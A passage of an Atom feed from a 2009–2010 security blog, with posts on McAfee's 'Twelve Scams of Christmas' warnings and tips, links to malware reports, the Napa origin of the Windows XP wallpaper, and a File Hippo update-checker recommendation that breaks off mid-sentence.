<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-1732826304675968996</id><updated>2011-07-28T18:51:36.267-07:00</updated><category term='being a security professional'/><category term='Hackers Holiday'/><category term='payment CPayment Card Industry'/><category term='Pursue your career'/><category term='Flash Player Exploit'/><category term='A step ahead'/><category term='SQL Injection'/><category term='malware'/><category term='Letter To Google'/><category term='FCKEditor 0Day'/><category term='blog conduct'/><category term='What is Wrong with PCI'/><category term='McAfee'/><category term='The Overall Picture'/><category term='embedded url'/><category term='Payment Card Industry'/><category term='Security Twits'/><category term='FTP hack prevention'/><category term='Visa Compliance'/><category term='compromise'/><category term='Subcommittee on Emerging Threats'/><category term='required OnSite Audit'/><category term='File Hippo'/><category term='Enable Logging'/><category term='Level 2 merchant'/><category term='Gumblar Prevention'/><category term='james a lester'/><category term='CSI style'/><category term='FTP hacked'/><category term='FTP breach'/><category term='Enable FTP logging'/><category term='FTP credentials'/><category term='PCI approved payment application'/><category term='Napa'/><category term='success of PCI'/><category term='The A-Team of Security'/><category term='ASV'/><category term='Nine-Ball'/><category term='cybercrime'/><category term='Prevent Malware'/><category term='Botnets'/><category term='0day Cold Fusion Vulnerability'/><category term='Mobile Threats'/><category term='Gumblar'/><category term='Log 
Analysis'/><category term='Google and SSL'/><category term='PCI standard'/><category term='July: Month of Twitter Bugs'/><category term='Gettin Shitty in Sin City'/><category term='cybersecurity'/><category term='Twitter'/><category term='James Lester'/><category term='APWG'/><category term='Microsoft'/><category term='McAfee Site Advisor'/><category term='Google redirect hack'/><category term='James A. Lester'/><category term='Top 10 Botnets'/><category term='Automated SQL Injection'/><category term='Log Parsing'/><category term='.htaccess hack'/><category term='PCI. ASV'/><category term='archive.org'/><category term='secure webserver from compromise'/><category term='Congress'/><category term='Current PCI Issues'/><category term='302 Redirect Exploit'/><category term='Hope I am not attacked by zombie nerd hackers who are hung over.'/><category term='Pirated software and malware'/><category term='Google hack'/><category term='Content Security Policy'/><category term='Twelve Scams Of Christmas'/><category term='windows'/><category term='McAfee HCommerce'/><category term='Securosis Intern Opportunity'/><category term='Password Reset Security'/><category term='Facebook'/><category term='malicious link'/><category term='Critical Adope Vulnerability'/><category term='a step in the right direction for PCI'/><category term='PCI'/><category term='Updates'/><category term='Adobe Reader Exploit'/><category term='Social Engineering'/><category term='Secure shopping cart'/><category term='Google'/><category term='McAfee Secure'/><category term='phishing'/><category term='FCKEditor Vulnerability'/><category term='OWASP Chapter Meeting'/><category term='McAfee Secure Standard'/><category term='disclosure'/><category term='Anti-Virus 2009'/><category term='QSA'/><category term='Botnet'/><category term='Stop H Commerce'/><category term='PCI Compliance'/><category term='redirect hack'/><title type='text'>{Se[C}ure],  By James A. 
Lester</title><subtitle type='html'>Observations and Opinions of Current Network and Web Application Security Topics.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://blog.igothacked.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>45</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-5497215756949327945</id><published>2010-01-25T11:30:00.000-08:00</published><updated>2010-01-25T12:06:44.585-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='James Lester'/><category scheme='http://www.blogger.com/atom/ns#' term='Napa'/><title type='text'>Windows XP desktop screen is a Napa, CA image</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bloximages.chicago2.vip.townnews.com/napavalleyregister.com/content/tncms/assets/editorial/6/f4/528/6f4528f0-03e9-11df-bf38-001cc4c03286.image.jpg?_dc=1263788698"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 494px; height: 619px;" 
src="http://bloximages.chicago2.vip.townnews.com/napavalleyregister.com/content/tncms/assets/editorial/6/f4/528/6f4528f0-03e9-11df-bf38-001cc4c03286.image.jpg?_dc=1263788698" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Just a quick update with a cool little article on how the original Windows XP desktop background image originated in Napa, CA (where I currently live).&lt;br /&gt;&lt;br /&gt;I have been a little busy with not being busy at work trying to get some of my own projects and issues taken care of.  The hardest thing about this blog for me is that it is hard to talk about work,  when you cannot talk about work.  What I mean by that,  is that I cannot write about anything that discloses sensitive information about a customer or something that McAfee does not approve. That is why anything that I have ever posted here does not go into tremendous detail.  I just like to keep up on writing and I actually enjoy it.&lt;br /&gt;&lt;br /&gt;I think I am going to utilize this time to work on the root of the domain.  I wanted to provide some details for the general public on where to find "useful" information if you have been the victim of a compromise or hacked.   I thought it would be a nice project and that is the overall reason why I even have this domain in the first place.  We will see if I ever go through with it though.&lt;br /&gt;&lt;br /&gt;Anyway,  check out this article in the local newspaper that shows the origin of the Windows XP default background image.   I swear I can almost determine where this picture was taken based on his description,  but the fact that it is all vineyard now makes it difficult.&lt;br /&gt;&lt;br /&gt;Anyway, see for yourself.  
(&lt;a href="http://www.napavalleyregister.com/news/local/article_7703c8b2-03e9-11df-bb34-001cc4c03286.html"&gt;LINK&lt;/a&gt;)&lt;br /&gt;&lt;br /&gt;Image provided by www.napavalleyregister.com&lt;br /&gt;&lt;h1&gt;&lt;br /&gt;&lt;/h1&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-5497215756949327945?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/5497215756949327945/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=5497215756949327945' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/5497215756949327945'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/5497215756949327945'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2010/01/windows-xp-desktop-screen-is-napa-ca.html' title='Windows XP desktop screen is a Napa, CA image'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-7636240774017636549</id><published>2009-12-23T07:59:00.000-08:00</published><updated>2009-12-23T08:02:47.740-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hackers Holiday'/><category scheme='http://www.blogger.com/atom/ns#' term='McAfee'/><title type='text'>A Hackers Holiday</title><content type='html'>I have been away 
from the office for a bit due to a cold that won't go away.  Check out this YouTube video put on by McAfee.  Received this in an email this week.&lt;br /&gt;&lt;object height="285" width="340"&gt;&lt;param name="movie" value="http://www.youtube.com/v/xtMz2fG5FDU&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0&amp;amp;color1=0x3a3a3a&amp;amp;color2=0x999999&amp;amp;border=1"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/xtMz2fG5FDU&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0&amp;amp;color1=0x3a3a3a&amp;amp;color2=0x999999&amp;amp;border=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" height="285" width="340"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-7636240774017636549?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/7636240774017636549/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=7636240774017636549' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/7636240774017636549'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/7636240774017636549'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/12/hackers-holiday.html' title='A Hackers Holiday'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-5588038944637891333</id><published>2009-11-19T10:00:00.000-08:00</published><updated>2009-11-19T10:24:13.830-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Prevent Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Twelve Scams Of Christmas'/><category scheme='http://www.blogger.com/atom/ns#' term='McAfee'/><title type='text'>McAfee's "Twelve Scams Of Christmas"</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_GV9ejoAirVk/SwWNSBqFSBI/AAAAAAAAAQ8/Gc3pLyI0Lmk/s1600/Nikolaus_Malware_m+%28Small%29.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 251px; height: 320px;" src="http://1.bp.blogspot.com/_GV9ejoAirVk/SwWNSBqFSBI/AAAAAAAAAQ8/Gc3pLyI0Lmk/s320/Nikolaus_Malware_m+%28Small%29.jpg" alt="" id="BLOGGER_PHOTO_ID_5405882268550252562" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;McAfee has released their own version of the popular Christmas saying in "The Twelve Scams Of Christmas",  revealing the 12 most dangerous scams users should be aware of during this Christmas season.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;Scam I:&lt;/span&gt;&lt;span style="font-size:130%;"&gt; &lt;/span&gt;&lt;span style="font-style: italic; color: rgb(51, 102, 255);font-size:130%;" &gt;Charity Phishing Scams – Be Careful Who You Give To&lt;/span&gt;&lt;br /&gt;During the holiday season, hackers take advantage of citizens’ generosity by sending e-mails that appear to be from legitimate charitable organizations. 
In reality, they are fake Web sites designed to steal donations, credit card information and the identities of donors.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;Scam II:&lt;/span&gt;&lt;span style="font-size:130%;"&gt; &lt;/span&gt;&lt;span style="font-style: italic; color: rgb(51, 51, 255);font-size:130%;" &gt;Fake Invoices from Delivery Services to Steal Your Money&lt;/span&gt;&lt;br /&gt;During the holidays, cybercriminals often send fake invoices and delivery notifications appearing to be from Federal Express, UPS or the U.S. Customs Service. They e-mail consumers asking for credit card details to credit back the account, or require users to open an online invoice or customs form to receive the package. Once completed, the person’s information is stolen or malware is automatically installed on their computer.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;Scam III:&lt;/span&gt;&lt;span style="font-size:130%;"&gt; &lt;/span&gt;&lt;span style="font-style: italic; color: rgb(51, 51, 255);font-size:130%;" &gt;Social Networking – A Cybercriminal “Wants to be Your Friend” &lt;/span&gt;&lt;br /&gt;Cybercriminals take advantage of this social time of the year by sending authentic-looking “New Friend Request” e-mails from social networking sites. Internet users should beware that clicking on links in these e-mails can automatically install malware on computers and steal personal information.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;Scam IV:&lt;/span&gt;&lt;span style="font-size:130%;"&gt; &lt;/span&gt;&lt;span style="font-style: italic; color: rgb(51, 51, 255);font-size:130%;" &gt;The Dangers of Holiday E-Cards &lt;/span&gt;&lt;br /&gt;Cyber thieves cash in on consumers who send holiday e-cards in an effort to be environmentally conscious. Last holiday season, McAfee Labs discovered a worm masked as Hallmark e-cards and McDonald’s and Coca-Cola holiday promotions. 
Holiday-themed PowerPoint e-mail attachments are also popular among cybercriminals. Be careful what you click on.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;Scam V:&lt;/span&gt;&lt;span style="font-size:130%;"&gt; &lt;/span&gt;&lt;span style="font-style: italic; color: rgb(51, 51, 255);font-size:130%;" &gt;“Luxury” Holiday Jewelry Comes at a High Price&lt;/span&gt;&lt;br /&gt;McAfee Labs recently uncovered a new holiday campaign that leads shoppers to malware-ridden sites offering “discounted” luxury gifts from Cartier, Gucci, and Tag Heuer. Cybercriminals even use fraudulent logos of the Better Business Bureau to trick shoppers into buying products they never receive.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;Scam VI:&lt;/span&gt;&lt;span style="font-size:130%;"&gt; &lt;/span&gt;&lt;span style="font-style: italic; color: rgb(51, 51, 255);font-size:130%;" &gt;Practice Safe Holiday Shopping – Online Identity Theft on the Rise &lt;/span&gt;&lt;br /&gt;Forrester Research Inc. predicts online holiday sales will increase this year, as more bargain hunters turn to the Web for deals. While users shop and surf on open hotspots, hackers can spy on their activity in an attempt to steal their personal information. McAfee tells users never to shop online from a public computer or on an open Wi-Fi network.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;Scam VII:&lt;/span&gt;&lt;span style="font-size:130%;"&gt; &lt;/span&gt;&lt;span style="font-style: italic; color: rgb(51, 51, 255);font-size:130%;" &gt;Christmas Carol Lyrics Can Be Dangerous – Risky Holiday Searches&lt;/span&gt;&lt;br /&gt;During the holidays, hackers create fraudulent holiday-related Web sites for people searching for a holiday ringtone or wallpaper, Christmas carol lyrics or a festive screensaver. Downloading holiday-themed files may infect one’s computer with spyware, adware or other malware. 
McAfee found one Christmas carol download site that led searchers to adware, spyware and other potentially unwanted programs.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;Scam VIII:&lt;/span&gt;&lt;span style="font-size:130%;"&gt; &lt;/span&gt;&lt;span style="font-style: italic; color: rgb(51, 51, 255);font-size:130%;" &gt;Out of Work – Job-Related E-mail Scams&lt;/span&gt;&lt;br /&gt;The U.S. unemployment rate recently spiked to 10.2 per cent, the highest level since 1983. Scammers are preying on desperate job-seekers in the poor economy, with the promise of high-paying jobs and work-from-home moneymaking opportunities. Once interested persons submit their information and pay their “set-up” fee, hackers steal their money instead of following through on the promised employment opportunity.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;Scam IX:&lt;/span&gt;&lt;span style="font-size:130%;"&gt; &lt;/span&gt;&lt;span style="font-style: italic; color: rgb(51, 51, 255);font-size:130%;" &gt;Outbidding for Crime – Auction Site Fraud&lt;/span&gt;&lt;br /&gt;Scammers often lurk on auction sites during the holiday season. Buyers should beware of auction deals that appear too good to be true, because often times these purchases never reach their new owner.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;Scam X:&lt;/span&gt;&lt;span style="font-size:130%;"&gt; &lt;/span&gt;&lt;span style="font-style: italic; color: rgb(51, 51, 255);font-size:130%;" &gt;Password Stealing Scams &lt;/span&gt;&lt;br /&gt;Password theft is rampant during the holidays, as thieves use low-cost tools to uncover a person’s password and send out malware to record keystrokes, called keylogging. Once criminals have access to one or more passwords, they gain vast access to consumers’ bank and credit card details and clean out accounts within minutes. 
They also commonly send out spam from a user’s account to their contacts.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;Scam XI:&lt;/span&gt;&lt;span style="font-size:130%;"&gt; &lt;/span&gt;&lt;span style="font-style: italic; color: rgb(51, 51, 255);font-size:130%;" &gt;E-Mail Banking Scams&lt;/span&gt;&lt;br /&gt;Cybercriminals trick consumers into divulging their bank details by sending official-looking e-mails from financial institutions. They ask users to confirm their account information, including a user name and password, with a warning that their account will become invalid if they do not comply. Then they often sell this information through an underground online black market.&lt;br /&gt;&lt;br /&gt;McAfee Labs believes cybercriminals are more actively scamming consumers with this tactic during the holidays since people are monitoring their purchases closely.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;Scam XII:&lt;/span&gt;&lt;span style="font-size:130%;"&gt; &lt;/span&gt;&lt;span style="font-style: italic; color: rgb(51, 51, 255);font-size:130%;" &gt;Your Files for Ransom – Ransomware Scams&lt;/span&gt;&lt;br /&gt;Hackers gain control of people’s computers through several of these holiday scams. They then act as virtual kidnappers to hijack computer files and encrypt them, making them unreadable and inaccessible. The scammer holds the user’s files ransom by demanding payment in exchange for getting them back.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;McAfee also advises Internet users to follow these five tips to protect their computers and personal information:  &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;1.    
&lt;span style="color: rgb(51, 51, 255);"&gt;Never Click on Links in E-Mails:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; Go directly to a company or charity’s Web site by typing in the address or using a search engine. Never click on a link in an e-mail.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;2.    &lt;span style="color: rgb(51, 51, 255);"&gt;Use Updated Security Software:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; Protect your computer from malware, spyware, viruses and other threats with updated security suites.  McAfee® Total Protection software provides fully-featured protection from current and emerging threats. It also comes built in with McAfee SiteAdvisor® technology, a safe search toolbar to warn consumers of a Web site’s safety rating as well as phishing protection. It uses intuitive red, yellow and green checkmarks to rate potentially dangerous Web sites when searched on Google, Yahoo! or Bing.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;font-size:130%;" &gt;3.    &lt;span style="color: rgb(51, 51, 255);"&gt;Shop and Bank on Secure Networks:&lt;/span&gt;&lt;/span&gt; Only check bank accounts or shop online on secure networks at home or work, wired or wireless. Wi-Fi networks should always be password-protected so hackers cannot gain access to them and spy on online activity.&lt;br /&gt;&lt;br /&gt;Also, remember to only shop on Web sites that begin with https://, instead of http://, and seek out Web sites with security trustmarks, like McAfee SECURE™.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;font-size:130%;" &gt;4.    &lt;span style="color: rgb(51, 51, 255);"&gt;Use Different Passwords:&lt;/span&gt;&lt;/span&gt; Never use the same passwords for several online accounts. 
Diversify passwords and use a complex combination of letters, numbers and symbols.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;font-size:130%;" &gt;5.    &lt;span style="color: rgb(51, 51, 255);"&gt;Use Common Sense:&lt;/span&gt;&lt;/span&gt; If you are ever in doubt that an offer or product is not legitimate, do not click on it. Cybercriminals are behind many of the seemingly “good” deals on the Web, so exercise caution when searching and buying.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-5588038944637891333?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/5588038944637891333/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=5588038944637891333' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/5588038944637891333'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/5588038944637891333'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/11/mcafees-twelve-scams-of-christmas.html' title='McAfee&apos;s &quot;Twelve Scams Of Christmas&quot;'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_GV9ejoAirVk/SwWNSBqFSBI/AAAAAAAAAQ8/Gc3pLyI0Lmk/s72-c/Nikolaus_Malware_m+%28Small%29.jpg' height='72' 
width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-86422024060019</id><published>2009-11-02T10:35:00.000-08:00</published><updated>2009-11-02T10:44:33.433-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Microsoft'/><title type='text'>Link:  Microsoft Security Intelligence Report v7 (Jan-Jul 09)</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_GV9ejoAirVk/Su8ojCpNH6I/AAAAAAAAAPk/8xKUxieMGVM/s1600-h/Microsoft-malware.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 182px;" src="http://3.bp.blogspot.com/_GV9ejoAirVk/Su8ojCpNH6I/AAAAAAAAAPk/8xKUxieMGVM/s320/Microsoft-malware.png" alt="" id="BLOGGER_PHOTO_ID_5399579060710743970" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Microsoft has recently updated their Security Intelligence Report that tries to identify the latest and greatest of malicious trends.&lt;br /&gt;A quote from their &lt;a href="http://blogs.technet.com/mmpc/archive/2009/11/02/security-intelligence-report-v7-is-now-available.aspx"&gt;malware blog&lt;/a&gt;.&lt;br /&gt;"In this edition we provide an in-depth review of malicious and potentially unwanted software, software exploits, security breaches, software vulnerabilities (both Microsoft and third party) around the world as well as providing detailed views of a number of countries. 
We review malware distribution sites by country, discuss phishing and spam trends and geographic distribution, details on vulnerability disclosure practices, differences in threat distribution between consumers and enterprise and we also provide guidance for IT professionals and business decision makers based on this information."&lt;br /&gt;Check the report out here (&lt;a href="http://www.microsoft.com/sir"&gt;LINK&lt;/a&gt;).&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-86422024060019?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/86422024060019/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=86422024060019' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/86422024060019'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/86422024060019'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/11/link-microsoft-security-intelligence.html' title='Link:  Microsoft Security Intelligence Report v7 (Jan-Jul 09)'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_GV9ejoAirVk/Su8ojCpNH6I/AAAAAAAAAPk/8xKUxieMGVM/s72-c/Microsoft-malware.png' height='72' 
width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-5352393587368499684</id><published>2009-11-02T10:27:00.000-08:00</published><updated>2009-11-02T10:44:59.937-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Facebook'/><category scheme='http://www.blogger.com/atom/ns#' term='Twitter'/><title type='text'>Link: How to avoid Malware on Facebook and Twitter.</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_GV9ejoAirVk/Su8op--mIII/AAAAAAAAAPs/LQJnzewdXhk/s1600-h/twitter-malware.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 188px;" src="http://3.bp.blogspot.com/_GV9ejoAirVk/Su8op--mIII/AAAAAAAAAPs/LQJnzewdXhk/s320/twitter-malware.jpg" alt="" id="BLOGGER_PHOTO_ID_5399579179985805442" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;You can always count on the fact that with the increased popularity that &lt;a href="http://www.facebook.com/"&gt;Facebook&lt;/a&gt; and &lt;a href="http://www.twitter.com/"&gt;Twitter&lt;/a&gt; are receiving,  malware on these sites will soon follow and grow.&lt;br /&gt;&lt;a href="http://www.readwriteweb.com/"&gt;Read Write Web&lt;/a&gt; has posted an article of how to prevent or avoid popular malware tactics.&lt;br /&gt;Check it out here (&lt;a href="http://www.readwriteweb.com/archives/how_to_avoid_malware_on_facebook_and_twitter_8_best_practices.php"&gt;LINK&lt;/a&gt;)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-5352393587368499684?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/5352393587368499684/comments/default' title='Post Comments'/><link rel='replies' 
type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=5352393587368499684' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/5352393587368499684'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/5352393587368499684'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/11/link-how-to-avoid-malware-on-facebook.html' title='Link: How to avoid Malware on Facebook and Twitter.'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_GV9ejoAirVk/Su8op--mIII/AAAAAAAAAPs/LQJnzewdXhk/s72-c/twitter-malware.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-2926048821628593154</id><published>2009-10-28T15:16:00.001-07:00</published><updated>2009-10-29T11:00:37.810-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Gumblar Prevention'/><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><category scheme='http://www.blogger.com/atom/ns#' term='Updates'/><category scheme='http://www.blogger.com/atom/ns#' term='File Hippo'/><title type='text'>File Hippo: Update Checker - The answer to keeping your workstation up to date.</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_GV9ejoAirVk/SujFpE2fgII/AAAAAAAAAPU/cRtGQMBCvzs/s1600-h/filehippo.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; 
text-align: center; cursor: pointer; width: 320px; height: 108px;" src="http://2.bp.blogspot.com/_GV9ejoAirVk/SujFpE2fgII/AAAAAAAAAPU/cRtGQMBCvzs/s320/filehippo.JPG" alt="" id="BLOGGER_PHOTO_ID_5397781462871146626" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.filehippo.com/"&gt;File Hippo&lt;/a&gt;, which serves pretty much every piece of software that you could ever possibly want, came out with their own update checker.  This very small app looks to see what software you have installed, determines whether an update is available, and prompts you.  It does this without taking control of your computer and will not install any update without your permission.&lt;br /&gt;This looks to be an awesome update utility that is perfect for everyone from the newest computer user all the way to the very experienced.&lt;br /&gt;The application is very small, and you can install it without having it automatically start when your computer starts.&lt;br /&gt;Keeping your software up to date is the biggest tip I can ever offer someone who wants to keep their computer virus/malware free.&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);font-size:130%;" &gt;I highly recommend this app to anyone who does not already have a decent strategy for 